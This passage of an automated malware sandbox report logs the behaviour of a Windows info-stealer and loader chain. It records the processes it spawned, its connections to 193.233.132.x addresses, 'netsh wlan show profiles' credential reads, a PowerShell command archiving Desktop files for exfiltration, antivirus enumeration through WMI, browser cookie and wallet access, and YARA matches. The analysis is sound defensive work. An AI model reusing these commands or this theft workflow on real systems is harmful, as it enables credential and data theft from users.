                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_00399B02 mov eax, dword ptr fs:[00000030h]14_2_00399B02
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeMemory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.233.132.56 80
                              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 193.233.132.167 80
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe
                              Source: C:\Windows\System32\rundll32.exeProcess created: unknown unknown
                              Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmp, 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmp, 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, explorha.exe, 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: ;Program Manager
                              Source: amert.exe, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: zProgram Manager
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0037CD47 cpuid 14_2_0037CD47
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B9E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00B9E27A
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                              Lowering of HIPS / PFW / Operating System Security Settings

                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, type: DROPPED
                              Source: Yara matchFile source: 15.2.chrosha.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.amert.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe.b80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.2.explorha.exe.700000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.explorha.exe.700000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
                              Source: Yara matchFile source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: c884f8452a.exe PID: 7988, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 1864, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, type: DROPPED
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
